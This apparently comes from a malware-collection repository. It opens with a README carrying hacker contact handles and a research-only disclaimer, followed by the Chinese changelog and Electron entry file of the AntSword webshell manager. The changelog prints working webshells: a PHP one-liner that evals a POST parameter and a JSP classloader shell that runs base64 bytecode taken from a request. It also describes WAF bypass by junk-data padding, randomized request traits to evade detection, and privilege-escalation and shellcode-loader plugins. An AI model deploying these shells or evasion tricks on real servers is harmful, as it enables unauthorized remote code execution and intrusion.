README.md
# Disclaimer

TELEGRAM: @fireroothacker

EMAIL ME: attack@fireroothacker.ga /// attack@darkwebspider.tk

TOR MAIL: fireroothacker@gtfcy37qyzor7kb6blz2buwuu5u7qjkycasjdf3yaslibkbyhsxub4yd.onion

This repository is for research purposes only, the use of this code is your responsibility.

I take NO responsibility and/or liability for how you choose to use any of the source code available here. By using any of the files available in this repository, you understand that you are AGREEING TO USE AT YOUR OWN RISK. Once again, ALL files available here are for EDUCATION and/or RESEARCH purposes ONLY.

I'm not the author of any of the code available here. This repository contains malware source code samples leaked online (and found in multiple other sources), I uploaded it to GitHub to simplify the process of those who want to analyze the code.

Any actions and/or activities related to the material contained within this repository is solely your responsability. Misuse of the information in this repository can result in criminal charges being brought against the persons in question. I will not be held responsible in the event any criminal charges are brought against any individuals misuing the code in this repository to break the law.

This repository does not promote any hacking related activity. All the information in this repository is for educational purposes only.

# DarkwebSpider.tk

## What is Tor?
Tor is free software and an open network that helps you defend against traffic analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security.
* [https://www.torproject.org/download/](https://www.torproject.org/download/)

## What is I2P?
The Invisible Internet Project (I2P) is a fully encrypted private network layer that has been developed with privacy and security by design in order to provide protection for your activity, location and your identity. The software ships with a router that connects you to the network and applications for sharing, communicating and building.
* [https://geti2p.net/en/download](https://geti2p.net/en/download)

## What is Freenet?
Freenet is free software which lets you anonymously share files, browse and publish "freesites" (web sites accessible only through Freenet) and chat on forums, without fear of censorship. Freenet is decentralised to make it less vulnerable to attack, and if used in "darknet" mode, where users only connect to their friends, is very difficult to detect.
* [https://freenetproject.org/](https://freenetproject.org/)


antSword/CHANGELOG.md
# 更新日志
> 有空会补补BUG、添添新功能。    
> 同时也欢迎大家的参与！感谢各位朋友的支持！ .TAT.

## 2021/03/27 `v(2.1.11.1)`

### 核心

* 修复 PHP 类型数据库连接在PHP7下函数废除引起的问题

## 2021/03/26 `v(2.1.11)`

### 后端模块

* 修改发包默认 UserAgent 为 随机 User-Agent
* 修复 Chunk 发包下 Download 异常问题 #272 (thx @c2xusnpq6)
* 修复 Download 在 chunk 和 multipart 发包模式下 asunescape 不生效的问题

### 核心

* JSP 类型支持「解码器」
* 「解码器」 asoutput 新增传入参数 ext, 结构如下:

```
{
  opts: opts: 类型为 Object, Shell 配置
}
```
* 修复使用 default 编码器服务端其它函数输出 payload 时数据分割解析的问题

eg: 

```php
<?php phpinfo();eval($_POST['ant']);phpinfo();?>
```

因为 `phpinfo();` 会显示发送的 payload, 发送的 payload 中含有数据分割符，导致分割出错

*  移除 random 编码器

> 能够适配所有编码器的Shell比较少, 这个功能就略显鸡肋, 我们决定移除它

* JSP Template 升级至 [v1.5](https://github.com/AntSwordProject/AntSword-JSP-Template/releases/tag/1.5)
  * 支持解码器(返回包加密)
  * 兼容 JDK5
  * 修复base64编码问题&改正错别字
  * 修改获取当前目录的方式

### 其它

* 优化窗口关闭逻辑 #245

 * 点击最小化时，不再最小化至系统托盘。点击窗口的关闭按钮，最小化至系统托盘。
 * 点击托盘菜单中的「退出」程序退出。
 * 点击菜单中的「退出程序」程序退出。

* 「编码管理」新增新建「JSP解码器」

## 2021/02/06 `v(2.1.10)`

### 核心

* 升级 JSP Template 到 v1.4
  * 兼容 JDK6
  * 兼容 Weblogic 内存 Webshell
  * 优化报错信息
  * 解决windows下中文乱码的问题（win选择GBK编码，linux选择UTF-8编码）
  * 实战中只能获取到response的情况几乎没有，所以为了减少payload体积不再支持response作为入口参数
  * 增加用于测试 payload 的Web项目
  * 修复 java -jar xxx.war 启动时当前目录获取失败的问题

### 数据管理

* 修复 context menu category self-xss (thx @lixuesv)

### 其它

* 优化插件加载, 加载异常的插件不会再影响到其它插件加载了
* 更新纯真IP库(2021/02/02)
* 文档地址更换到语雀 https://www.yuque.com/antswordproject/antsword/
* 加入 404Team [404StarLink 2.0 - Galaxy](https://github.com/knownsec/404StarLink2.0-Galaxy)

 > 非常有幸能够加入星链计划, 大家有空可以了解一下星链计划，有许多很酷的安全项目, 你一定不想错过

### 插件相关

* [As-Exploits](https://github.com/AntSword-Store/GenShell) 升级到 v1.1

  * 增加对aspx类型的支持
  * 增加提权辅助模块（aspx/jsp/php）
  * 增加屏幕截图模块（jsp）
  * 增加shellcode加载器模块（aspx）
  * 仅展示当前类型可用模块，不可用模块不再显示

* [GenShell](https://github.com/AntSword-Store/GenShell) 升级到 v0.2

 > 新增 asp、aspx、jsp 三种 Shell 类型生成

* [AS_Redis](https://github.com/AntSword-Store/AS_Redis) 升级到 v0.4

  > 支持 jsp 类型

* [PortScan](https://github.com/AntSword-Store/PortScan) 升级到 v0.3

 > 支持 jsp、php4 类型

* [as_netstat](https://github.com/AntSword-Store/as_netstat) 升级到 v0.2

  > 支持所有类型


## 2020/09/10 `v(2.1.9)`

### 核心

* 新增 JSP 类型一句话支持 (**试验功能**)

使用的 Shell 例如：

```
<%!
class U extends ClassLoader{
  U(ClassLoader c){
    super(c);
  }
  public Class g(byte []b){
    return super.defineClass(b,0,b.length);
  }
}
%>
<%
String cls=request.getParameter("ant");
if(cls!=null){
  new U(this.getClass().getClassLoader()).g(new sun.misc.BASE64Decoder().decodeBuffer(cls)).newInstance().equals(pageContext);
}
%>
```

> JSP 类型目前采用硬编码字节码方式, 编译版本为 jdk 1.7, 可根据使用场景自行编译。

代码模版参见: https://github.com/AntSwordProject/AntSword-JSP-Template

**注意**

JSP 类型 Shell 修改文件权限功能，不支持 Windows 系统，在 Linux 系统下不支持 SUID 设置

> 例如设置为 2644 实际上与 0644 效果相同

* 新增其他参数增加随机前缀

### 后端模块

* request 增加垃圾数据填充功能 (thx: @yzddmr6)

> 支持 form-data 和 multipart 模式

![mass_1.png](https://i.loli.net/2020/01/19/32HiSUvjPrMwfy5.png)

![mass_2.png](https://i.loli.net/2020/01/19/EaKruhcHklPFAe7.png)

![mass_3.png](https://i.loli.net/2020/01/19/UOX2HKuYyJQS7R1.png)

该模块不会改变 payload, 仅会填充垃圾数据, 部分基于 nginx 二次开发的 WAF 会因为过多参数导致 WAF 获取不到后面的数据，从而达到 Bypass 目的。

测试 paper 参见: [yzddmr6的 Blog —— 蚁剑改造计划之增加垃圾数据](https://yzddmr6.tk/posts/antsword-diy-1/)

### Security

* Fix ViewSite security issue #256

### 其它

* 插件支持的脚本类型支持通配符 `*`

> 如果插件的 package.json 文件中的 scripts 设置为 `*`, 则可被所有类型的插件调用。

## 2019/12/04 `v(2.1.8.1)`

* Fix ViewSite security issue thx @imagemlt

## 2019/12/04 `v(2.1.8)`

### 核心

* 修复全局过滤 xss 时 text 和 buff 过滤规则不一致问题
* core.command.exec 增加第 3个参数 env

 格式为: `key1|||askey|||val1|||asline|||key2|||askey|||val2|||asline|||`
 
 对应的环境变量为:

```
key1=val1
key2=val2
```

### 数据管理

* 新增「自定义数据分割符」配置

> 你可以将任何你喜欢的字符组合定义成数据的「起始符」或「结束符」

![data_separtor_1.png](https://i.loli.net/2019/11/05/per1BvOMh5IKZqt.png)

![data_separtor_2.png](https://i.loli.net/2019/11/05/QECmJprI5FldB9b.png)

* 修复「创建副本」时不会同步 decoder 的问题

### 文件管理

* 编辑文件新增「刷新」按钮

 > 如果服务器上的文件内容发生改变, 再也不需要关掉重打开了

* 新建文件默认内容更改为 `#Halo AntSword!`

* 编辑文件文件路径改为输入框, 现在可以手动输入文件路径后, 按 Enter 键快速打开文件了

![file_manager_filepath.png](https://i.loli.net/2019/12/04/rtpJCafoDLSBsAi.png)

### 虚拟终端

* 新增 `asenv` 本地指令, 用于手动设置当前终端下的环境变量

Linux:

![terminal_asenv_1.png](https://i.loli.net/2019/12/03/k3AgCmlNbIM8QDZ.png)

Windows:

![terminal_asenv_2.png](https://i.loli.net/2019/12/03/uzjvAgRT1Bdbkhw.png)

> 注意: asp 下设置之后, 当前机器上的IIS子进程都会受影响, 过一段时间子进程退出后正常

* 新增 `aswinmode` 本地指令, 在自动识别操作系统错误时, 可使用该指令手动切换命令行运行的模式 (#229 thx @nullnull1604-outlook)

![terminal_aswinmode.png](https://i.loli.net/2019/12/03/HpbjN6sERhYoiUX.png)

### 其它

* ACE 编辑器增加 `ace/mode/antswordjwt` 语法模式, 支持 JWT Token 语法高亮

## 2019/10/30 `v(2.1.7)`

### 安全更新

* fix #222 感谢 @9tail123
* **重要**: 增加全局 html 转义, 在每次响应后强制进行 html 转义, 避免过滤时漏掉的问题

 > 此更新会影响大部分插件的使用, 请及时更新插件或重装插件
 >
 > 如果在使用当中发现二次转义的情况, 请报告 issue

* 新增「报告漏洞」链接, 可在「关于程序」页中看到, 也可点下面的链接直达

 https://forms.gle/HrUMxedsyREeXw4R9

 > 如在后续发现漏洞, 请以该方式进行提交, 待修复后再公开

## 2019/09/17 `v(2.1.6)`

### 后端模块

* 修复数据截取 Bug
* 修复返回包`Content-Type`为非文本时连接异常问题 (#213)

### 核心模块

* 数据分割字符随机化增强(随机内容, 随机长度 5~12 位), 避免客户端发包产生固定的 `Content-Length`
* 新增 `antSword["RANDOMWORDS"]` 全局变量, 存放英文单词, 如需要定制字典请修改 `source/base/word.js`
* 新增 `antSword["utils"]` 全局变量, 包函 `RandomChoice`, `RandomLowercase` 函数
* 发包随机变量名去除 `_0x` 通用变量前缀
* 核心模版发包键名支持随机英文单词

### Shell 管理

* 新增「使用随机英文单词变量」配置项, 在发包时非密码变量名会使用随机产生的英文单词 (thx @Ch1ngg)

![ranword_1.png](https://i.loli.net/2019/09/03/vxVCiZ6znb2MGkt.png)

未勾选此配置项时, 发包变量名如下:

![randword_2.png](https://i.loli.net/2019/09/03/bEUonV3QXTa1pSD.png)

勾选此项设置后, 发包变量名如下:

![randword_3.png](https://i.loli.net/2019/09/03/iwRZF8gbh6WEdlO.png)

* 新增常用插件功能面板, 可自定义配置常用插件到此面板, 快速调用

![shell_toolbar.png](https://i.loli.net/2019/09/03/Wu82S65Oq3EPopt.png)

### 其它

* `jsp_custom_script_for_mysql` 提供 `AES` 编码解码示例
* `jsp_custom_script_for_mysql` 增加 Version 显示
* windows 下单击鼠标左键 Tray Icon 显示/隐藏 主窗口 改为 「双击」
* 默认设置新增 「使用随机英文单词变量」配置项
* 移除 shells 目录, 示例脚本已转至 [AwesomeScript](https://github.com/AntSwordProject/AwesomeScript) 仓库下

### 插件相关


antSword/source/app.entry.js
/**
 * 中国蚁剑::程序入口
 * 创建：2015/12/20
 * 更新：2016/05/02
 * 作者：蚁逅 <https://github.com/antoor>
 */

'use strict';

const fs = require('fs'),
  path = require('path'),
  electron = require('electron'),
  shell = electron.shell,
  remote = electron.remote,
  ipcRenderer = electron.ipcRenderer;

const Menubar = require('./base/menubar');
const CacheManager = require('./base/cachemanager');
const Decodes = require('./base/decodes');

const antSword = window.antSword = {
  /**
   * XSS过滤函数
   * @param  {String}  html 过滤前字符串
   * @param  {Boolean} wrap 是否过滤换行
   * @return {String}       过滤后的字符串
   */
  noxss: (html = '', wrap = true) => {
    let _html = String(html)
      .replace(/&/g, "&amp;")
      .replace(/'/g, "&apos;")
      .replace(/>/g, "&gt;")
      .replace(/</g, "&lt;")
      .replace(/"/g, "&quot;");
    if (wrap) {
      _html = _html.replace(/\n/g, '<br/>');
    }
    return _html;
  },
  /**
   * unxss
   * @param  {String}  html 转义的字符串
   * @param  {Boolean} wrap 是否反转义换行
   * @return {String}       反转义后的字符串
   */
  unxss: (html = '', wrap = true) => {
    let _html = String(html)
      .replace(/&apos;/g, "'")
      .replace(/&gt;/g, ">")
      .replace(/&lt;/g, "<")
      .replace(/&quot;/g, '"')
      .replace(/&amp;/g, "&");
    if (wrap) {
      _html = _html.replace(/<br\/>/g, '\n'); // 只替换 noxss 转义过的
    }
    return _html;
  },
  /**
   * 终端日志数据
   * @type {Array}
   */
  logs: [],
  /**
   * 自定义编码器
   * @type {Object}
   */
  encoders: {},
  /**
   * 自定义解码器
   * @type {Object}
   */
  decoders: {},
  /**
   * 核心模块
   * @type {Object}
   */
  core: {},
  /**
   * 插件列表
   * @type {Object}
   */
  plugins: {},
  /**
   * 操作模块
   * @type {Object}
   */
  modules: {},
  /**
   * 模块
   */
  module: {},
  /**
   * localStorage存储API
   * ? 如果只有一个key参数，则返回内容，否则进行设置
   * @param  {String} key   存储键值，必选
   * @param  {String} value 存储内容，可选
   * @param  {String} def   默认内容，可选
   * @return {None}       [description]
   */
  storage: (key, value, def) => {
    // 读取
    if (!value) {
      return localStorage.getItem(key) || def;
    };
    if (typeof (value) === "object")
      value = JSON.stringify(value);

    // 设置
    localStorage.setItem(key, value);
  },
  /**
   * 重新加载插件（包含开发者&&本地插件库
   * @return {[type]} [description]
   */
  reloadPlug() {
    antSword['plugins'] = {};
    // 加载插件：：本地
    let pluginHome = ipcRenderer.sendSync('store-config-plugPath');
    fs
      .readdirSync(pluginHome)
      .map((_) => {
        let pluginPath = path.join(pluginHome, _);
        // 如果不是目录，则跳过
        if (!fs.lstatSync(pluginPath).isDirectory()) {
          return
        }
        // 存储路径&&package信息到全局变量antSword['plugins']
        try {
          antSword['plugins'][_] = {
            _id: _,
            path: pluginPath,
            info: JSON.parse(fs.readFileSync(path.join(pluginPath, 'package.json')))
          }
        } catch (error) {
          return
        }
      });
    // 加载插件：：开发
    let devPlugPath = antSword.storage('dev-plugPath');
    if (antSword.storage('isDev') === '1' && fs.existsSync(devPlugPath) && fs.lstatSync(devPlugPath).isDirectory()) {
      fs
        .readdirSync(devPlugPath)
        .map((_) => {
          let _path = path.join(devPlugPath, _);
          // 如果不是目录，则跳过
          if (!fs.lstatSync(_path).isDirectory()) {
            return
          }
          try {
            antSword['plugins'][_] = {
              _id: _,
              path: _path,
              info: JSON.parse(fs.readFileSync(path.join(_path, 'package.json')))
            }
          } catch (error) {
            return
          }
        });
    }
    // 加载工具栏
    antSword.modules.shellmanager.toolbar.reloadToolbar()
  }
};

// 加载核心模板
antSword['core'] = require('./core/');

// 加载语言模板
antSword['language'] = require('./language/');

// 加载编码
antSword['encoders'] = (function () {
  var encoders = {
    asp: [],
    aspx: [],
    jsp: [],
    php: [],
    custom: []
  };
  var encoders_path = {
    asp: [],
    aspx: [],
    jsp: [],
    php: [],
    custom: []
  };
  let userencoder_path = path.join(remote.process.env.AS_WORKDIR, 'antData/encoders');
  // 初始化
  !fs.existsSync(userencoder_path) ?
    fs.mkdirSync(userencoder_path) :
    null;
  ['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
    !fs.existsSync(path.join(userencoder_path, `${t}`)) ?
      fs.mkdirSync(path.join(userencoder_path, `${t}`)) :
      null;
    let t_path = path.join(userencoder_path, `${t}/encoder/`);
    !fs.existsSync(t_path) ?
      fs.mkdirSync(t_path) :
      null;

    let es = fs.readdirSync(t_path);
    if (es) {
      es.map((_) => {
        if (!_.endsWith(".js")) {
          return
        }
        encoders[t].push(_.slice(0, -3));
        encoders_path[t].push(path.join(t_path, _.slice(0, -3)));
      });
    }
    antSword["core"][t].prototype.user_encoders = encoders_path[t];
  });

  // // custom let es = fs.readdirSync(userencoder_path); if(es){   es.map((_)=>{
  //    console.log(_);     let farr = _.split("#");
  // encoders[farr[0]].push(farr[1].slice(0,-3));   }); } default
  // ['asp','aspx','php','custom'].map((t)=>{
  // antSword["core"][t].prototype.encoders.map((e)=>{     encoders[t].push(e);
  // });   encoders[t] = encoders[t].unique(); });
  // fs.readdirSync(path.join(process.env.AS_WORKDIR,'encoder'),(err,f) => {
  // if(err || !f) return ;   console.debug(f);   let farr = f.split("#");
  // encoders[farr[0]].push(farr[1]); });
  return encoders;
})();

// 加载解码器
antSword['decoders'] = (function () {
  var decoders = {
    asp: [],
    aspx: [],
    php: [],
    jsp: [],
    custom: []
  };
  var decoders_path = {
    asp: [],
    aspx: [],
    php: [],
    jsp: [],
    custom: []
  };
  let userdecoder_path = path.join(remote.process.env.AS_WORKDIR, 'antData/encoders');
  // 初始化
  !fs.existsSync(userdecoder_path) ?
    fs.mkdirSync(userdecoder_path) :
    null;
    ['asp', 'aspx', 'php', 'jsp', 'custom'].map((t) => {
    !fs.existsSync(path.join(userdecoder_path, `${t}`)) ?
      fs.mkdirSync(path.join(userdecoder_path, `${t}`)) :
      null;
    let t_path = path.join(userdecoder_path, `${t}/decoder/`);
    !fs.existsSync(t_path) ?
      fs.mkdirSync(t_path) :
      null;

    let es = fs.readdirSync(t_path);
    if (es) {
      es.map((_) => {
        if (!_.endsWith(".js")) {
          return
        }
        decoders[t].push(_.slice(0, -3));
        decoders_path[t].push(path.join(t_path, _.slice(0, -3)));
      });
    }
    antSword["core"][t].prototype.user_decoders = decoders_path[t];
  });

  // // custom let es = fs.readdirSync(userdecoder_path); if(es){   es.map((_)=>{
  //    console.log(_);     let farr = _.split("#");
  // encoders[farr[0]].push(farr[1].slice(0,-3));   }); } default
  // ['asp','aspx','php','custom'].map((t)=>{
  // antSword["core"][t].prototype.encoders.map((e)=>{     encoders[t].push(e);
  // });   encoders[t] = encoders[t].unique(); });
  // fs.readdirSync(path.join(process.env.AS_WORKDIR,'encoder'),(err,f) => {
  // if(err || !f) return ;   console.debug(f);   let farr = f.split("#");
  // encoders[farr[0]].push(farr[1]); });
  return decoders;
})();

// 加载代理
const aproxy = {
  mode: antSword['storage']('aproxymode', false, 'noproxy'),
  port: antSword['storage']('aproxyport'),
  server: antSword['storage']('aproxyserver'),
  password: antSword['storage']('aproxypassword'),
  username: antSword['storage']('aproxyusername'),
  protocol: antSword['storage']('aproxyprotocol')
}
antSword['aproxymode'] = aproxy['mode'];

antSword['aproxyauth'] = (!aproxy['username'] || !aproxy['password']) ?
  '' :
  `${aproxy['username']}:${aproxy['password']}`;

antSword['aproxyuri'] = `${aproxy['protocol']}:\/\/${antSword['aproxyauth']}${antSword['aproxyauth'] === ""
  ? ""
  : "@"}${aproxy['server']}:${aproxy['port']}`;

// 通知后端设置代理
ipcRenderer.send('aproxy', {
  aproxymode: antSword['aproxymode'],
  aproxyuri: antSword['aproxyuri']
});

antSword['shell'] = shell;
antSword['remote'] = remote;
antSword['ipcRenderer'] = ipcRenderer;
antSword['CacheManager'] = CacheManager;
antSword['Decodes'] = new Decodes();
antSword['menubar'] = new Menubar();
antSword['RANDOMWORDS'] = require('./base/words');
antSword['utils'] = require('./base/utils');
antSword['package'] = require('../package');

// 加载模块列表
antSword['tabbar'] = new dhtmlXTabBar(document.body);
['shellmanager', 'settings', 'plugin'].map((_) => {
  let _module = require(`./modules/${_}/`);
  antSword['modules'][_] = new _module();
});

['shellmanager', 'settings', 'plugin', 'database', 'terminal', 'viewsite', 'filemanager'].map((_) => {
  antSword['module'][_] = require(`./modules/${_}/`);
})

// 移除加载界面&&设置标题
$('#loading').remove();
document.title = antSword['language']['title'] || 'AntSword';

/**
 * 日志组输出
 * - 日志只会输出最多100个字符，如果想查看全部数据，则可以通过antSword.logs[id]进行查看
 * @param  {Object} opt   日志对象[0=日志，1=对象]
 * @param  {String} color 输出颜色
 * @return {[type]}       [description]
 */
const groupLog = (opt, color) => {
  if (antSword.logs.length % 10 === 0) {
    console.group(`LOGS: ${antSword.logs.length}+`);
  }
  let lineNum = antSword['logs'].push(opt[1]) - 1;
  console.log(`%c0x${lineNum < 10
    ? '0' + lineNum
    : lineNum}\t${opt[0].substr(0, 100) + (opt[0].length > 100
      ? '..'
      : '')}`, `color:${color}`);
  if (antSword.logs.length % 10 === 0) {
    console.groupEnd();
  }
}

// 监听后端消息
ipcRenderer
  /**
   * 刷新UI（shellmanager侧边栏
   * @param  {[type]} 'reloadui' [description]
   * @param  {[type]} (          [description]
   * @return {[type]}            [description]
   */
  .on('reloadui', () => {
    setTimeout(() => {
      antSword
        .modules
        .shellmanager
        .category
        .cell
        .setWidth(222);
    }, 555);
  })
  /**
   * 通知提示 Loader 更新
   * @param  {[type]} 'notification-loader-update' [description]
   * @param  {[type]} (e,                   opt           [description]
   * @return {[type]}                       [description]
   */
  .on('notification-loader-update', (e, opt) => {
    const LANG = antSword["language"]["settings"]["update"];
    let n = new Notification(antSword['language']['update']['title'], {
      body: antSword['language']['update']['body'](opt['ver'])
    });
    n.addEventListener('click', () => {
      antSword
        .shell
        .openExternal(opt['url']);
    });
    layer.confirm(LANG['prompt']['loader_body'](opt['ver']), {
      icon: 3,
      shift: 6,
      title: LANG['prompt']['title']
    }, (_) => {
      antSword
        .shell
        .openExternal(opt['url']);
      antSword
        .remote
        .app
        .quit();
    });
  })
  /**
   * 通知提示更新
   * @param  {[type]} 'notification-update' [description]
   * @param  {[type]} (e,                   opt           [description]
   * @return {[type]}                       [description]
   */
  .on('notification-update', (e, opt) => {
    const LANG = antSword["language"]["settings"]["update"];
    let n = new Notification(antSword['language']['update']['title'], {
      body: antSword['language']['update']['body'](opt['ver'])
    });
    // 文件大小计算
    const getFileSize = (t) => {
      let i = false;
      let b = [
        "b",
        "Kb",
        "Mb",
        "Gb",
        "Tb",
        "Pb",
        "Eb"
      ];
      for (let q = 0; q < b.length; q++)
        if (t > 1024)
          t = t / 1024;
        else if (i === false)
        i = q;
      if (i === false)
        i = b.length - 1;
      return Math.round(t * 100) / 100 + " " + b[i];
    }
    n.addEventListener('click', () => {
      antSword
        .shell
        .openExternal(opt['url']);
    });
    const WIN = require('ui/window');
    let win = new WIN({
      title: antSword['language']['update']['title'],
      height: 430,
      width: 480
    });
    win
      .win
      .setIconCss("update-winicon");
    win
      .win
      .button("minmax")
      .hide();
    win
      .win
      .denyResize();
    let uplayout = win
      .win
      .attachLayout('1C');
    uplayout
      .cells('a')
      .hideHeader();

    let formdata = [{
      type: "label",
      name: "form_msg",
      label: LANG["prompt"]["body"](opt['ver']),
      offsetLeft: 5
    }, {
      type: "container",
      name: "form_body",
      label: "",
      inputWidth: 450,
      inputHeight: 300
    }, {
      type: "block",
      list: [{
        type: "newcolumn",
        offset: 20
      }, {
        type: "button",
        name: "updatebtn",
        value: `<i class="fa fa-cloud-download"></i> ${LANG["prompt"]["btns"]["ok"]}`,
        className: "background-color: #39c;"
      }, {
        type: "newcolumn",
        offset: 20
      }, {
        type: "button",
        name: "changelogbtn",
        value: `<i class="fa fa-chrome"></i> ${LANG["prompt"]["btns"]["changelog"]}`
      }, {
        type: "newcolumn",
        offset: 20
      }, {
        type: "button",
        name: "canclebtn",
        value: `<i class="fa fa-remove"></i> ${LANG["prompt"]["btns"]["no"]}`
      }]
    }];
    uplayout
      .cells('a')
      .attachForm(formdata, true);
    win
      .win
      .attachEvent('onParkUp', () => {
        if (win.win.isParked()) {
          win
            .win
            .wins
            ._winSetSize(win.win._idd, 240, (win.win.wins.w[win.win._idd].hdr.offsetHeight + win.win.wins.conf.ofs_h), false, true);
        }
        win
          .win
          .setPosition(document.body.clientWidth - 300, document.body.clientHeight - 150);
        return true;
      });
    win
      .win
      .attachEvent('onParkDown', () => {
        win
          .win
          .setDimension(478, 428);
        win
          .win
          .centerOnScreen();
        return true;
      });
    const form = uplayout
      .cells('a')
      .attachForm(formdata, true);
    let form_body = new dhtmlXLayoutObject(form.getContainer('form_body'), '1C');
    form_body
      .cells('a')
      .hideHeader();
    const marked = require('marked');
    let _html = `<html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <style type="text/css">
    body {
      zoom:80%;
    }
    img {
      width:100%;
    }
    </style>
    </head>
    <body>
      ${marked(opt['body']).replace(/<a.+?(href=".+?")/g, "<a")}
    </body>
    </html>`;
    form_body
      .cells('a')
      .attachHTMLString(`<iframe sandbox="" src="data:text/html;base64,${Buffer.from(_html).toString('base64')}" style="width:100%;height:100%;border:0;padding:0;margin:0;"></iframe>`);
    form.attachEvent("onButtonClick", (name) => {
      switch (name) {
        case "updatebtn":
          var workdir = antSword.remote.process.env.AS_WORKDIR;
          if (fs.existsSync(path.join(workdir, ".git/"))) {
            win.close();
            layer.alert(LANG["message"]["githint"](workdir));
            return
          }
          const hash = (String(+new Date) + String(Math.random()))
            .substr(10, 10)
            .replace('.', '_');
          //折叠
          win
            .win
            .park();
          antSword
            .ipcRenderer
            .send("update-download", {
              hash: hash
            });
          win
            .win
            .progressOn();
          win.setTitle(LANG["message"]["prepare"]);
          antSword['ipcRenderer'].on(`update-dlprogress-${hash}`, (event, progress, isprogress) => {
            if (isprogress == true) {
              win.setTitle(LANG["message"]["dling"](progress));
            } else {
              win.setTitle(LANG["message"]["dlingnp"](getFileSize(progress)));
            }
          }).once(`update-dlend-${hash}`, (event) => {
            win.setTitle(LANG["message"]["dlend"]);
            win
              .win
              .progressOff();
            toastr.success(antSword["language"]["success"], LANG["message"]["extract"]);
          }).once(`update-error-${hash}`, (event, err) => {
            win
              .win
              .progressOff();
            win.close();
            toastr.error(antSword["language"]['error'], LANG["message"]["fail"](err));
          });
          break;
        case "canclebtn":
          win.close();
          break;
        case "changelogbtn":
          antSword
            .shell
            .openExternal(opt['url']);
          break;
      }
    });
  }).on('update-success', (e, opt) => {
    const LANG = antSword['language']['settings']['update'];
    toastr.success(antSword["language"]["success"], LANG["message"]["success"]);
    layer.confirm(LANG['message']['success'], {
      icon: 1,
      shift: 6,
      title: LANG['prompt']['title']
    }, (_) => {
      // location.reload();
      antSword
        .remote
        .app
        .quit();
    });
  })
  /**
   * 重新加载本地插件
   * @param  {[type]} 'reloadPlug' [description]
   * @param  {[type]} (            [description]
   * @return {[type]}              [description]
   */
  .on('reloadPlug', antSword.reloadPlug.bind(antSword))
  /**
   * 后端日志输出
   * + 用于在前端控制台输出后端的日志
   * - 可使用`antSword.logs[id]`来获取详细日志
   */
  .on('logger-debug', (e, opt) => {
    groupLog(opt, '#607D8B');
  }).on('logger-info', (e, opt) => {
    groupLog(opt, '#4CAF50');
  }).on('logger-warn', (e, opt) => {
    groupLog(opt, '#FF9800');
  }).on('logger-fatal', (e, opt) => {
    groupLog(opt, '#E91E63');
  });

antSword.reloadPlug();
antSword['menubar'].reg('check-update', () => {
  antSword
    .ipcRenderer
    .send('check-update');
  antSword
    .ipcRenderer
    .send('check-loader-update');
});

if (new Date() - new Date(parseInt(antSword['storage']('lastautocheck', false, "0"))) >= 86400000) {
  // 检查更新
  antSword['storage']('lastautocheck', new Date().getTime());
  setTimeout(() => {
    antSword.ipcRenderer.send.bind(antSword.ipcRenderer, 'check-update');
    antSword.ipcRenderer.send.bind(antSword.ipcRenderer, 'check-loader-update');
  }, 1000 * 60);
}